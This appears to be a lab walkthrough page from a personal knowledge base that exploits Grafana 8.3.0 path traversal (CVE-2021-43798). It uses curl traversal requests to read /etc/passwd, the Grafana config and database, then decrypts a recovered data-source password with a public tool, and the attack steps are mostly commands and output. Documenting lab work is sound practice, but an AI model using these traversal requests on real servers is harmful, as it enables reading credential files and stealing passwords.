Grafana 8.3.0

Reading the Files

The exploit from searchsploit was not returning the results.

curl --path-as-is curl --path-as-is http://192.168.156.181:3000/public/plugins/alertlist/../../../../../../../../etc/passwd

Reading Grafana config

curl --path-as-is curl --path-as-is http://192.168.156.181:3000/public/plugins/alertlist/../../../../../../../../etc/grafana/grafana.ini

Reading database file

curl --path-as-is -s http://192.168.156.181:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db

Find basic auth

anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==

Find secret key in the .ini file.

# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm

Downloading the exploit to decrypt the key

git clone https://github.com/jas502n/Grafana-CVE-2021-43798.git

Change the secret key and auth key in the go file.

Exploit

go mod init example/hello
go tidy
go run AESDecrypt.go

[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
[*] DataSourcePassword= anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==
[*] plainText= SuperSecureP@ssw0rd
 
 
[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
[*] PlainText= jas502n
[*] EncodePassword= THBXSVgzN3fsXdpUlrVpAKbgMOEb0ABTVZ4B/fGWwA==

Malleum Knowledge Base

Explorer

Grafana 8.3.0

Reading the Files

Reading Grafana config

Reading database file

Find basic auth

Find secret key in the .ini file.

Downloading the exploit to decrypt the key

Change the secret key and auth key in the go file.

Exploit

Graph View

Table of Contents

Backlinks